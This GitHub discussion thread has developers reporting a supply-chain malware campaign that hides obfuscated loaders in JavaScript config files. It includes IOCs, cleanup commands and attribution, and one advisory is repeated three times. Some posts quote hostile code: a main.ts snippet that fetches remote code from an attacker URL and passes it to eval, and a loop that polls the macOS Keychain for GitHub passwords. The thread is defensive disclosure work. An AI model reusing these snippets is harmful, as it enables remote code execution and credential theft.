Obfuscated code suddenly appearing in next.config.js / postcss.config.js without direct file changes

[robellorin]

Select Topic Area

General

Body

Hi everyone,

I recently noticed something strange in a few private repositories I worked on. Around November 15, heavily obfuscated JavaScript code suddenly appeared in configuration files like next.config.js and postcss.config.js.

The unusual part is that the commits where these files appeared do not clearly show intentional changes to those files. In some cases, the code shows up in a later PR even though the file wasn’t modified in the previous commit. This also happened across multiple repositories and even under commits from different developers.

The injected code looks like an obfuscated loader that decodes and executes hidden payloads, which made me concerned it might be malicious or the result of some automated injection (possibly from a dependency or build process).

Has anyone seen something similar before or knows what might cause this behavior?
next.config.js
postcss.config.js

Thanks.

[FaheemRafiq]

Hi @robellorin,

The same thing is happening to me and my team. We haven’t been able to find the cause, but it appears to be using a force push to rewrite the commit history.

If you find any solution, please let us know.

[semitha-dev]

Warning: Blockchain C2 Malware Hidden in PostCSS Config Files

Overview

A supply chain attack is targeting JavaScript/Node.js developers by injecting obfuscated malware into postcss.config.mjs files. The payload is appended to the export default config; line after ~280 spaces of whitespace, making it completely invisible in editors, git diffs, and code reviews unless you scroll far to the right.

Tip: to find it scroll to the right. it wont be visible on the first look.

The infection vector is cloning malicious GitHub repos commonly sent as "coding tests" via Upwork, LinkedIn, or Freelancer job interviews. You don't need to run the code. Cloning the repo or opening it in an editor can be enough to trigger the injection.

How the malware works

Every time PostCSS loads the infected config (during npm run dev, npm run build, or any Tailwind CSS processing):

1. Fetches encrypted commands from blockchain transactions on TRON and Binance Smart Chain (BSC) censorship-resistant C2 that can't be taken down
2. Decrypts and eval()s the payload inside your Node.js process with full system access
3. Spawns a hidden detached node.exe process (windowsHide: true) running a second payload that survives until reboot
4. Scans your machine for other JavaScript projects and injects the same payload into their postcss.config.mjs
5. Commits and pushes to your GitHub repos using cached Git credentials creating fake commits or rewriting your legitimate commits to include the payload

How to detect it

• File size - a normal postcss config is ~80-200 bytes. Infected: ~5,000+ bytes
• Scroll right - on the export default config; line hidden code after hundreds of spaces means infection
• Search your projects - for global['!'] or _$_1e42 or global['_V']='A4-1928'
• Compare local files to GitHub - the malware can push infected versions to GitHub that differ from your local copies
• Check GitHub commit history - look for commits you didn't make (e.g., generic messages like "Add copy code button")

Why antivirus won't detect it

• Plain JavaScript text appended to a config file no executable, no binary signature
• Actual malicious payload is fetched from blockchain and decrypted in memory never touches disk
• Runs inside node.exe, a trusted signed process
• No persistence (no registry, no startup entries, no scheduled tasks) re-executes every time PostCSS loads

Kaspersky, Windows Defender, and other antivirus tools will report clean. This is by design.

Indicators of Compromise (IOCs)

Type	Value
Campaign marker	global['!']='4-1928', global['_V']='A4-1928'
TRON wallet 1	TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP
TRON wallet 2	TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG
XOR key 1	2[gWfGj;<:-93Z^C
XOR key 2	m6:tTh^D)cBz?NM]
C2 endpoints	api.trongrid.io, bsc-dataseed.binance.org, bsc-rpc.publicnode.com
Obfuscation variable	_$_1e42

Cleanup steps

1. Kill active malware processes

# Find suspicious node processes (PowerShell):
Get-CimInstance Win32_Process -Filter "Name='node.exe'" | Select-Object ProcessId, CommandLine

# Look for "node -e" with obfuscated content kill it:
Stop-Process -Id <PID> -Force

2. Clean infected config files

Open postcss.config.mjs in every JavaScript project. Remove everything after export default config;. Also remove any createRequire imports the malware may have added.

3. Revoke cached Git credentials

# Windows:
cmdkey /delete:git:https://github.com

# Also check: GitHub → Settings → Developer Settings → Personal Access Tokens
# Revoke anything you don't recognize

4. Audit GitHub repos

• Check all repos for commits you didn't make
• Check postcss.config.mjs in every repo via GitHub's web interface (local files may differ from what's on GitHub)
• Clean infected files via GitHub's web editor

5. Rotate secrets

• All API keys, database credentials, and secrets in .env files the malware could read process.env
• Review account security pages (Google, GitHub, etc.) for unauthorized sessions

What you DON'T need to do

• Factory reset — the malware is fileless; cleaning the config file and killing the process removes it completely
• Reinstall Node.js — Node itself is not compromised
• Run more antivirus scans — they can't detect this type of attack

Prevention

• Never clone repos from strangers — especially "coding tests" from freelancing platforms
• Monitor config file sizes — a jump from ~100 bytes to ~5,000 bytes is a red flag
• Use SSH keys instead of cached HTTPS credentials for Git
• Use git diff --stat before committing to catch unexpected file size changes
• Use passkeys/2FA for GitHub and other accounts

Attribution

Attributed to the Lazarus Group (DPRK) "Contagious Interview" campaign, active since 2023. Targets developers via fake job interviews. Primary goal: cryptocurrency wallet theft, credential harvesting, and source code exfiltration. Blockchain-based C2 makes infrastructure impossible to take down.

[faizrazadec]

@semitha-dev there’s one more related issue I observed.

This kind of attack usually takes time (even days). In my case, only one repo was initially affected. I was using gh, then switched to SSH, but started getting repeated macOS Keychain popups asking for access to my credentials. Even after denying, the prompt kept appearing.

While investigating, I noticed a Python script running in the background, and my system was still connected to the internet. It’s possible something was being triggered remotely. Once I turned off Wi-Fi and denied the request, the popups stopped.

To understand how credential prompts could be triggered like that, I ran this command:

until pass=$(security -q find-internet-password -a github-username -s github.com -w 2>/dev/null); do
done
echo "$pass"

This suggests there may have been a process repeatedly trying to access stored GitHub credentials from the Keychain.

So it’s quite possible that even after initial infection, a malicious process keeps running to regain access (e.g., re-fetch tokens or credentials). Sharing some insight on this behavior would be really helpful.

[semitha-dev]

@faizrazadec what you're describing matches a secondary persistence/credential-harvesting stage that runs independently of the postcss injection.

The repeated Keychain prompts are expected behavior for this campaign. The detached node.exe (or in your case, likely a Python equivalent on macOS) spawned by the initial payload doesn't just exit it loops, trying to re-access stored credentials. Your until loop demonstrates exactly the technique: brute-force polling security find-internet-password until the user either approves or the process is killed. On macOS, denying a Keychain prompt doesn't kill the requesting process, so it just retries.

Why turning off Wi-Fi stopped it: the C2 logic likely has a "no network = pause" branch to avoid burning CPU/showing prompts when it can't exfiltrate anyway. Once you reconnected denied, it had no fresh instructions to keep prompting.

To fully clean the secondary stage on macOS:

Find suspicious python/node processes

ps aux | grep -E "(python|node).*-(c|e)" | grep -v grep

Check launch agents/daemons (the malware sometimes drops these)

ls -la ~/Library/LaunchAgents/
ls -la /Library/LaunchAgents/
ls -la /Library/LaunchDaemons/

Check for anything in your shell rc files

grep -E "(curl|wget|eval|base64)" ~/.zshrc ~/.bashrc ~/.profile 2>/dev/null

Check cron

crontab -l
For the Keychain specifically: open Keychain Access → search "github" → delete any internet password entries you don't recognize, then re-add only via SSH key (which you've already switched to — good move).

One more thing to check: the Python script you saw — grab its full command line with ps -ef | grep python before killing it, and check if it was reading from a file in /tmp, ~/Library/Caches/, or ~/.npm/. Those are common drop locations for the second-stage loader. If you still have it, sharing the path/hash would help others identify the macOS variant.

The fact that it kept trying after you switched to SSH confirms the malicious process doesn't care which auth method you use now — it's trying to grab whatever's still cached from before. Full credential rotation (GitHub PATs, SSH keys regenerated, any tokens in ~/.netrc or ~/.config/gh/) is the only way to be sure.

[Hassam-01]

Seems to have affected few of my repos, pls let us know if you find any solution.

[semitha-dev]

Warning: Blockchain C2 Malware Hidden in PostCSS Config Files

Overview

A supply chain attack is targeting JavaScript/Node.js developers by injecting obfuscated malware into postcss.config.mjs files. The payload is appended to the export default config; line after ~280 spaces of whitespace, making it completely invisible in editors, git diffs, and code reviews unless you scroll far to the right.

Tip: to find it scroll to the right. it wont be visible on the first look.

The infection vector is cloning malicious GitHub repos commonly sent as "coding tests" via Upwork, LinkedIn, or Freelancer job interviews. You don't need to run the code. Cloning the repo or opening it in an editor can be enough to trigger the injection.

How the malware works

Every time PostCSS loads the infected config (during npm run dev, npm run build, or any Tailwind CSS processing):

1. Fetches encrypted commands from blockchain transactions on TRON and Binance Smart Chain (BSC) censorship-resistant C2 that can't be taken down
2. Decrypts and eval()s the payload inside your Node.js process with full system access
3. Spawns a hidden detached node.exe process (windowsHide: true) running a second payload that survives until reboot
4. Scans your machine for other JavaScript projects and injects the same payload into their postcss.config.mjs
5. Commits and pushes to your GitHub repos using cached Git credentials creating fake commits or rewriting your legitimate commits to include the payload

How to detect it

• File size - a normal postcss config is ~80-200 bytes. Infected: ~5,000+ bytes
• Scroll right - on the export default config; line hidden code after hundreds of spaces means infection
• Search your projects - for global['!'] or _$_1e42 or global['_V']='A4-1928'
• Compare local files to GitHub - the malware can push infected versions to GitHub that differ from your local copies
• Check GitHub commit history - look for commits you didn't make (e.g., generic messages like "Add copy code button")

Why antivirus won't detect it

• Plain JavaScript text appended to a config file no executable, no binary signature
• Actual malicious payload is fetched from blockchain and decrypted in memory never touches disk
• Runs inside node.exe, a trusted signed process
• No persistence (no registry, no startup entries, no scheduled tasks) re-executes every time PostCSS loads

Kaspersky, Windows Defender, and other antivirus tools will report clean. This is by design.

Indicators of Compromise (IOCs)

Type	Value
Campaign marker	global['!']='4-1928', global['_V']='A4-1928'
TRON wallet 1	TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP
TRON wallet 2	TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG
XOR key 1	2[gWfGj;<:-93Z^C
XOR key 2	m6:tTh^D)cBz?NM]
C2 endpoints	api.trongrid.io, bsc-dataseed.binance.org, bsc-rpc.publicnode.com
Obfuscation variable	_$_1e42

Cleanup steps

1. Kill active malware processes

# Find suspicious node processes (PowerShell):
Get-CimInstance Win32_Process -Filter "Name='node.exe'" | Select-Object ProcessId, CommandLine

# Look for "node -e" with obfuscated content kill it:
Stop-Process -Id <PID> -Force

2. Clean infected config files

Open postcss.config.mjs in every JavaScript project. Remove everything after export default config;. Also remove any createRequire imports the malware may have added.

3. Revoke cached Git credentials

# Windows:
cmdkey /delete:git:https://github.com

# Also check: GitHub → Settings → Developer Settings → Personal Access Tokens
# Revoke anything you don't recognize

4. Audit GitHub repos

• Check all repos for commits you didn't make
• Check postcss.config.mjs in every repo via GitHub's web interface (local files may differ from what's on GitHub)
• Clean infected files via GitHub's web editor

5. Rotate secrets

• All API keys, database credentials, and secrets in .env files the malware could read process.env
• Review account security pages (Google, GitHub, etc.) for unauthorized sessions

What you DON'T need to do

• Factory reset — the malware is fileless; cleaning the config file and killing the process removes it completely
• Reinstall Node.js — Node itself is not compromised
• Run more antivirus scans — they can't detect this type of attack

Prevention

• Never clone repos from strangers — especially "coding tests" from freelancing platforms
• Monitor config file sizes — a jump from ~100 bytes to ~5,000 bytes is a red flag
• Use SSH keys instead of cached HTTPS credentials for Git
• Use git diff --stat before committing to catch unexpected file size changes
• Use passkeys/2FA for GitHub and other accounts

Attribution

Attributed to the Lazarus Group (DPRK) "Contagious Interview" campaign, active since 2023. Targets developers via fake job interviews. Primary goal: cryptocurrency wallet theft, credential harvesting, and source code exfiltration. Blockchain-based C2 makes infrastructure impossible to take down.

[semitha-dev]

Warning: Blockchain C2 Malware Hidden in PostCSS Config Files

Overview

A supply chain attack is targeting JavaScript/Node.js developers by injecting obfuscated malware into postcss.config.mjs files. The payload is appended to the export default config; line after ~280 spaces of whitespace, making it completely invisible in editors, git diffs, and code reviews unless you scroll far to the right.

Tip: to find it scroll to the right. it wont be visible on the first look.

The infection vector is cloning malicious GitHub repos commonly sent as "coding tests" via Upwork, LinkedIn, or Freelancer job interviews. You don't need to run the code. Cloning the repo or opening it in an editor can be enough to trigger the injection.

How the malware works

Every time PostCSS loads the infected config (during npm run dev, npm run build, or any Tailwind CSS processing):

1. Fetches encrypted commands from blockchain transactions on TRON and Binance Smart Chain (BSC) censorship-resistant C2 that can't be taken down
2. Decrypts and eval()s the payload inside your Node.js process with full system access
3. Spawns a hidden detached node.exe process (windowsHide: true) running a second payload that survives until reboot
4. Scans your machine for other JavaScript projects and injects the same payload into their postcss.config.mjs
5. Commits and pushes to your GitHub repos using cached Git credentials creating fake commits or rewriting your legitimate commits to include the payload

How to detect it

• File size - a normal postcss config is ~80-200 bytes. Infected: ~5,000+ bytes
• Scroll right - on the export default config; line hidden code after hundreds of spaces means infection
• Search your projects - for global['!'] or _$_1e42 or global['_V']='A4-1928'
• Compare local files to GitHub - the malware can push infected versions to GitHub that differ from your local copies
• Check GitHub commit history - look for commits you didn't make (e.g., generic messages like "Add copy code button")

Why antivirus won't detect it

• Plain JavaScript text appended to a config file no executable, no binary signature
• Actual malicious payload is fetched from blockchain and decrypted in memory never touches disk
• Runs inside node.exe, a trusted signed process
• No persistence (no registry, no startup entries, no scheduled tasks) re-executes every time PostCSS loads

Kaspersky, Windows Defender, and other antivirus tools will report clean. This is by design.

Indicators of Compromise (IOCs)

Type	Value
Campaign marker	global['!']='4-1928', global['_V']='A4-1928'
TRON wallet 1	TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP
TRON wallet 2	TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG
XOR key 1	2[gWfGj;<:-93Z^C
XOR key 2	m6:tTh^D)cBz?NM]
C2 endpoints	api.trongrid.io, bsc-dataseed.binance.org, bsc-rpc.publicnode.com
Obfuscation variable	_$_1e42

Cleanup steps

1. Kill active malware processes

# Find suspicious node processes (PowerShell):
Get-CimInstance Win32_Process -Filter "Name='node.exe'" | Select-Object ProcessId, CommandLine

# Look for "node -e" with obfuscated content kill it:
Stop-Process -Id <PID> -Force

2. Clean infected config files

Open postcss.config.mjs in every JavaScript project. Remove everything after export default config;. Also remove any createRequire imports the malware may have added.

3. Revoke cached Git credentials

# Windows:
cmdkey /delete:git:https://github.com

# Also check: GitHub → Settings → Developer Settings → Personal Access Tokens
# Revoke anything you don't recognize

4. Audit GitHub repos

• Check all repos for commits you didn't make
• Check postcss.config.mjs in every repo via GitHub's web interface (local files may differ from what's on GitHub)
• Clean infected files via GitHub's web editor

5. Rotate secrets

• All API keys, database credentials, and secrets in .env files the malware could read process.env
• Review account security pages (Google, GitHub, etc.) for unauthorized sessions

What you DON'T need to do

• Factory reset — the malware is fileless; cleaning the config file and killing the process removes it completely
• Reinstall Node.js — Node itself is not compromised
• Run more antivirus scans — they can't detect this type of attack

Prevention

• Never clone repos from strangers — especially "coding tests" from freelancing platforms
• Monitor config file sizes — a jump from ~100 bytes to ~5,000 bytes is a red flag
• Use SSH keys instead of cached HTTPS credentials for Git
• Use git diff --stat before committing to catch unexpected file size changes
• Use passkeys/2FA for GitHub and other accounts

Attribution

Attributed to the Lazarus Group (DPRK) "Contagious Interview" campaign, active since 2023. Targets developers via fake job interviews. Primary goal: cryptocurrency wallet theft, credential harvesting, and source code exfiltration. Blockchain-based C2 makes infrastructure impossible to take down.

[MedAmine441]

Based on analysis of this attack, here is a likely attack chain that explains what you're seeing:

Probable attack chain:

1. Developer installs a malicious npm package — commonly delivered as a coding test via freelancing platforms (Upwork, LinkedIn, Freelancer)
2. The worm executes immediately and scrapes locally cached credentials — this could be CI/CD platform tokens (Vercel, Netlify, Railway, Render) stored in ~/.config or the browser, GitHub PATs, or SSH keys
3. Attacker uses the stolen token to access the developer's deployment platform account
4. Platforms like Vercel, Netlify, etc. have read and write access to GitHub repos via their GitHub App installation — attacker leverages this to force-push a poisoned commit without ever logging into GitHub directly
5. The poisoned commit rewrites a legitimate recent commit — same message, same real file changes, but with malware appended to postcss.config.mjs
6. Since PostCSS loads on every build, the malware executes on every npm run dev, npm run build, and every CI/CD build — with full access to process.env and all secrets

This explains two things people find confusing:

• GitHub security log shows no foreign logins — the attacker never logged into GitHub interactively, they pushed silently via a stolen CI/CD token
• The commit looks legitimate — same message, same real code changes, just with the payload hidden after hundreds of spaces on one line

Specific IOCs to search for:

• global['!']='10-83-10' or global['_V']='A4-1928' or _$_1e42
• createRequire import added at the top of the config file
• Duplicate export default config; line
• .gitignore entries for temp_auto_push.bat / temp_interactive_push.bat — the attacker's own push automation scripts accidentally committed
• Config file size jumping from ~150 bytes to ~5,000+ bytes

Recommended cleanup:

• Revoke all tokens on your CI/CD platform (Vercel/Netlify/etc.) and GitHub — keep only freshly generated ones
• Rotate all secrets that were in .env files — the malware had access to process.env on every build
• Revert the malicious commit via GitHub web UI
• Audit next.config.js, tailwind.config.js, and all root-level config files in all your repos
• Use SSH keys instead of cached HTTPS credentials going forward

The blockchain-based C2 (as @semitha-dev noted) means the actual payload was never on disk — antivirus will always report clean.

[semitha-dev]

Excellent points. Thanks for expanding on that to give a more complete picture.

[ichintanjoshi]

This also affects vue.config.js.

I found this article which explains what happens a bit more.

[Abilash-Abi]

Here’s an online tool that helps identify infected repositories and clean malicious code Here Thought this might be useful for the community.

[semitha-dev]

thank you

[IhorSorish]

Sounds like a joke

[vicente-prizmstack]

This also affects astro.config.js and jest.config.js

[ekinndev]

This also happened to me. Here is what I’ve done so far.

First, you can run this command to check whether the malware process is currently running on your machine:

ps aux | grep -Ei "global\['_V'\]|A10-010|A10-2340|global\['r' \]=require|_t_t|166\.88\.54\.158|198\.105\.127\.210|23\.27\.202\.27" | grep -v grep

If it returns a node -e ... global['_V']... process, the malware is still running.

From what I’ve seen, the malware usually injects itself into config files. But in my case, it also created fake font files under the /public folder of projects, so make sure to check those as well.

I thought I had removed it everywhere and was safe, but yesterday the malware pushed commits to all repositories that my GitHub account had access to. Very annoying. And there is no evidence commit actually was edited. Author is same, dates are same. I only do see updated x hrs ago mark on github and when i do pull i do see all of my branches was force pushed.

So far, I have revoked my GitHub HTTPS access, recreated my SSH key, revoked OAuth application access, removed old sessions/tokens, and now I’m cleaning the affected repositories.

Also, block the known malicious IPs on your machine/firewall if possible:

166.88.54.158
198.105.127.210
23.27.202.27
154.91.0.103
136.0.9.8
166.88.4.2
23.27.120.142
202.155.8.173
166.88.134.82
188.43.33.249

I also realized it adds following code into my main.ts on nest.js project
(async () => { const src = atob(process.env.AUTH_API_KEY); const proxy = (await import('node-fetch')).default; try { const response = await proxy(src); if (!response.ok) throw new Error(HTTP error! status: ${response.status}); const proxyInfo = await response.text(); eval(proxyInfo); } catch (err) { console.error('Auth Error!', err); } })();

AUTH_API_KEY=https:// auth-confirm-l emon-alpha . vercel . app/api (Dont click)

Which is a vercel app it was added base64 encoded.

[semitha-dev]

thank you for you information

[ArnavPrashant]

Any idea what the main source of this virus is? Most projects I am working on were created from scratch, then how did my laptop get infected?

Also, what is this virus trying to accomplish? What are they gaining from all of this?

[semitha-dev]

At some point in time you have clone an infected repo from either already infected one or a repo that is already created to infect. The virus itself doesn’t live in the computer rather it block of code that connect with blockchain server to get its commands. Basically it take all you env keys from project and other projects locally in you computer then any secret key or debit/credit card info store in you browser but its main goal is to steal you crypto wallet key. The reason you oth project also got infected is because when you run the infected project it also get you GitHub login access and push code automatically to you other projects and you would never know unless you keep a track of push to GitHub.

…

On Wed, 3 Jun 2026 at 9:41 PM, Arnav Prashant Singh < ***@***.***> wrote: Any idea what the main source of this virus is? Most projects I am working on were created from scratch, then how did my laptop get infected? Also, what is this virus trying to accomplish? What are they gaining from all of this? — Reply to this email directly, view it on GitHub <#188732?email_source=notifications&email_token=BHTDY6OCFSOAXHKTHXPMYUT46BEZXA5CNFSNUABIM5UWIORPF5TWS5BNNB2WEL2ENFZWG5LTONUW63SDN5WW2ZLOOQXTCNZRGY4DMMJWUZZGKYLTN5XKO3LFNZ2GS33OUVSXMZLOOSWGM33PORSXEX3DNRUWG2Y#discussioncomment-17168616>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/BHTDY6JDL2FDIL3JSR7JZDL46BEZXAVCNFSM6AAAAACWI5H63SVHI2DSMVQWIX3LMV43URDJONRXK43TNFXW4Q3PNVWWK3TUHMYTOMJWHA3DCNQ> . Triage notifications, keep track of coding agent tasks and review pull requests on the go with GitHub Mobile for iOS <https://github.com/notifications/mobile/ios/BHTDY6KIHBPMKV4DZAF3WRL46BEZXA5CNFSNUABIM5UWIORPF5TWS5BNNB2WEL2ENFZWG5LTONUW63SDN5WW2ZLOOQXTCNZRGY4DMMJWUZZGKYLTN5XKO3LFNZ2GS33OUVSXMZLOOSVGM33PORSXEX3JN5ZQ> and Android <https://github.com/notifications/mobile/android/BHTDY6ILJXZMMCPTG5TT25T46BEZXA5CNFSNUABIM5UWIORPF5TWS5BNNB2WEL2ENFZWG5LTONUW63SDN5WW2ZLOOQXTCNZRGY4DMMJWUZZGKYLTN5XKO3LFNZ2GS33OUVSXMZLOOSXGM33PORSXEX3BNZSHE33JMQ>. Download it today! You are receiving this because you were mentioned.Message ID: ***@***.***>

[ArnavPrashant]

It could be possible that my system got compromised because of a compromised NPM package? I am very certain that I have not executed any repo or even cloned a repo from an external source. For the last 2 months, I have only worked on projects that I created from scratch on my system.

[ekinndev]

yes for my case I did a run compromised npm package. Especially npx commands

[ArnavPrashant]

May I know which package it was?

[semitha-dev]

Yes that’s it possible to get infected by npm package too. Always audit and check the npm package before installing it

…

On Thu, 4 Jun 2026 at 5:51 AM, Arnav Prashant Singh < ***@***.***> wrote: It could be possible that my system got compromised because of a compromised NPM package? I am very certain that I have not executed any repo or even cloned a repo from an external source. For the last 2 months, I have only worked on projects that I created from scratch on my system. — Reply to this email directly, view it on GitHub <#188732?email_source=notifications&email_token=BHTDY6MGWD6DIUKYMBSXUV346C6KHA5CNFSNUABIM5UWIORPF5TWS5BNNB2WEL2ENFZWG5LTONUW63SDN5WW2ZLOOQXTCNZRG4ZTINBYUZZGKYLTN5XKO3LFNZ2GS33OUVSXMZLOOSWGM33PORSXEX3DNRUWG2Y#discussioncomment-17173448>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/BHTDY6KBFEYHJSXBI4QC5PD46C6KHAVCNFSM6AAAAACWI5H63SVHI2DSMVQWIX3LMV43URDJONRXK43TNFXW4Q3PNVWWK3TUHMYTOMJXGM2DIOA> . Triage notifications, keep track of coding agent tasks and review pull requests on the go with GitHub Mobile for iOS <https://github.com/notifications/mobile/ios/BHTDY6KZ3MBJDHLLWLHJESL46C6KHA5CNFSNUABIM5UWIORPF5TWS5BNNB2WEL2ENFZWG5LTONUW63SDN5WW2ZLOOQXTCNZRG4ZTINBYUZZGKYLTN5XKO3LFNZ2GS33OUVSXMZLOOSVGM33PORSXEX3JN5ZQ> and Android <https://github.com/notifications/mobile/android/BHTDY6K5GIMMMTWRLVEDFB346C6KHA5CNFSNUABIM5UWIORPF5TWS5BNNB2WEL2ENFZWG5LTONUW63SDN5WW2ZLOOQXTCNZRG4ZTINBYUZZGKYLTN5XKO3LFNZ2GS33OUVSXMZLOOSXGM33PORSXEX3BNZSHE33JMQ>. Download it today! You are receiving this because you were mentioned.Message ID: ***@***.***>

[ArnavPrashant]

It is hard to check every npm package installed in the project. In the future, we may need a fast, virtual, isolated environment for doing development